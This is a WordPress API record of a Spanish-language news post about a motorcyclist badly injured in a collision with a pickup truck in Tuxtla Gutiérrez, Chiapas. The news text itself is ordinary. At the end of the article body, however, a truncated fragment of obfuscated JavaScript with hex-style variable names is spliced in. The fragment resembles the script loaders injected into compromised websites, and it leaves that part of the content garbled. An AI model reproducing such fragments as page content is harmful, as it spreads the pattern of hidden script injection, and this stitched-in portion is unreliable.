{"id":21265,"date":"2025-04-04T01:46:56","date_gmt":"2025-04-04T01:46:56","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21265"},"modified":"2025-04-04T01:46:56","modified_gmt":"2025-04-04T01:46:56","slug":"motociclista-resulto-herido-de-gravedad-al-chocar-contra-camioneta","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21265","title":{"rendered":"Motociclista result\u00f3 herido de gravedad al chocar contra camioneta"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250403-WA0048-1024x768.jpg\" alt=\"\" class=\"wp-image-21266\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250403-WA0048-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250403-WA0048-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250403-WA0048-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250403-WA0048-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/04\/IMG-20250403-WA0048.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 3 de abril del 2025. Tuxtla Guti\u00e9rrez.- Este jueves por la ma\u00f1ana el conductor de una motocicleta result\u00f3 herido de gravedad luego de chocar contra una camioneta cuando circulaba a la altura de la 9a Norte y esquina de la 2a Poniente del Barrio Col\u00f3n.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando Francisco Javier de 24 a\u00f1os circulaba en una Italika de color negro de Sur a Norte y se atraves\u00f3 sin precauci\u00f3n y se impact\u00f3 contra una Pick Up de color celeste.<\/p>\n\n\n\n<p>Por el fuerte golpe sali\u00f3 volando y la moto se estrell\u00f3 contra un Mazda de color rojo que estaba estacionado.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la Cruz Roja y Bomberos para atender al lesionado que result\u00f3 con traumatismo craneoencef\u00e1lico y fue trasladado al hospital Gilberto G\u00f3mez Maza.<\/p>\n\n\n\n<p>Los dos veh\u00edculos fueron levantados y puestos a disposici\u00f3n del Ministerio P\u00fablico en turno para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 3 de abril del 2025. Tuxtla Guti\u00e9rrez.- Este jueves por la ma\u00f1ana el conductor de una motocicleta result\u00f3 herido de gravedad luego de chocar contra una camioneta cuando circulaba a la altura de la 9a Norte y esquina de la 2a Poniente del Barrio Col\u00f3n. Los reportes oficiales informaron que, este &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21266,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-21265","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21265","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21265"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21265\/revisions"}],"predecessor-version":[{"id":21267,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21265\/revisions\/21267"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21266"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21265"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21265"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21265"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}